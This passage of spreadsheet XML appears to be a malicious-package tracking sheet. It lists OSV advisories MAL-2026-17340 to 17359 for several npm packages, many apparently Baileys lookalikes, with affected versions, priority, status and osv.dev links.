      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17340</t>
        </is>
      </c>
      <c r="D665" s="5" t="inlineStr"/>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="inlineStr"/>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr">
        <is>
          <t>npm:@astracode/byles-new</t>
        </is>
      </c>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr"/>
      <c r="S66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@astracode/byles-new (npm), version(s): 0.1.37, 0.1.36, 0.1.35, 0.1.3, 0.0.99, 0.1.2, 0.1.1, 0.1.0.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17340</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17341</t>
        </is>
      </c>
      <c r="D666" s="5" t="inlineStr"/>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="inlineStr"/>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr">
        <is>
          <t>npm:@badzz88/baileys</t>
        </is>
      </c>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr"/>
      <c r="S66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@badzz88/baileys (npm), version(s): 8.5.9, 8.5.7, 8.5.5, 8.5.4, 8.5.3, 8.5.2, 8.5.1.</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17341</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17342</t>
        </is>
      </c>
      <c r="D667" s="5" t="inlineStr"/>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="inlineStr"/>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/belbails</t>
        </is>
      </c>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr"/>
      <c r="S66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@bellaxchuu/belbails (npm), version(s): 1.0.1.</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17342</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17343</t>
        </is>
      </c>
      <c r="D668" s="5" t="inlineStr"/>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="inlineStr"/>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr"/>
      <c r="S66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@bellaxchuu/crystalred (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17344</t>
        </is>
      </c>
      <c r="D669" s="5" t="inlineStr"/>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="inlineStr"/>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/familyxtrx</t>
        </is>
      </c>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr"/>
      <c r="S66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@bellaxchuu/familyxtrx (npm), version(s): 0.1.5.</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17344</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17345</t>
        </is>
      </c>
      <c r="D670" s="5" t="inlineStr"/>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="inlineStr"/>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/flowblue</t>
        </is>
      </c>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/flowblue (npm), version(s): 1.5.7.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17345</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17346</t>
        </is>
      </c>
      <c r="D671" s="5" t="inlineStr"/>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="inlineStr"/>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/privatebails</t>
        </is>
      </c>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/privatebails (npm), version(s): 1.4.1.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17346</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17347</t>
        </is>
      </c>
      <c r="D672" s="5" t="inlineStr"/>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="inlineStr"/>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/skyblue</t>
        </is>
      </c>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/skyblue (npm), version(s): 2.1.2.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17347</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17348</t>
        </is>
      </c>
      <c r="D673" s="5" t="inlineStr"/>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="inlineStr"/>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/teambails</t>
        </is>
      </c>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/teambails (npm), version(s): 1.1.9, 1.1.8, 1.1.6, 1.1.4, 1.2.4.</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17348</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17349</t>
        </is>
      </c>
      <c r="D674" s="5" t="inlineStr"/>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="inlineStr"/>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/velvetry</t>
        </is>
      </c>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/velvetry (npm), version(s): 0.1.4, 0.1.3.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17349</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17350</t>
        </is>
      </c>
      <c r="D675" s="5" t="inlineStr"/>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="inlineStr"/>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/xtrxbails</t>
        </is>
      </c>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/xtrxbails (npm), version(s): 0.0.8.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17350</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17351</t>
        </is>
      </c>
      <c r="D676" s="5" t="inlineStr"/>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="inlineStr"/>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr">
        <is>
          <t>npm:@bottino/baileys</t>
        </is>
      </c>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr"/>
      <c r="S67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@bottino/baileys (npm), version(s): 1.0.14, 1.0.13, 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17351</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17352</t>
        </is>
      </c>
      <c r="D677" s="5" t="inlineStr"/>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="inlineStr"/>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys</t>
        </is>
      </c>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr"/>
      <c r="S67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 (npm), version(s): 1.0.3, 1.0.1.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17352</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17353</t>
        </is>
      </c>
      <c r="D678" s="5" t="inlineStr"/>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="inlineStr"/>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys-new</t>
        </is>
      </c>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr"/>
      <c r="S67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@fhkryxv/baileys-new (npm), version(s): 0.3.22.</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17353</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17354</t>
        </is>
      </c>
      <c r="D679" s="5" t="inlineStr"/>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="inlineStr"/>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr">
        <is>
          <t>npm:@hanzofc/baileys</t>
        </is>
      </c>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr"/>
      <c r="S67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@hanzofc/baileys (npm), version(s): 7.0.1, 7.0.0.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17354</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17355</t>
        </is>
      </c>
      <c r="D680" s="5" t="inlineStr"/>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="inlineStr"/>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr">
        <is>
          <t>npm:@ikanngeming/ikannbail</t>
        </is>
      </c>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr"/>
      <c r="S68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@ikanngeming/ikannbail (npm), version(s): 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2.</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17355</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17356</t>
        </is>
      </c>
      <c r="D681" s="5" t="inlineStr"/>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="inlineStr"/>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikkysingle</t>
        </is>
      </c>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr"/>
      <c r="S68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@ikyyjee/ikkysingle (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17356</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17357</t>
        </is>
      </c>
      <c r="D682" s="5" t="inlineStr"/>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="inlineStr"/>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysinggle</t>
        </is>
      </c>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr"/>
      <c r="S68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@ikyyjee/ikyysinggle (npm), version(s): 1.7.7.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17357</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17358</t>
        </is>
      </c>
      <c r="D683" s="5" t="inlineStr"/>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="inlineStr"/>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysingle</t>
        </is>
      </c>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr"/>
      <c r="S68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@ikyyjee/ikyysingle (npm), version(s): 1.7.8.</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17358</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17359</t>
        </is>
      </c>
      <c r="D684" s="5" t="inlineStr"/>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
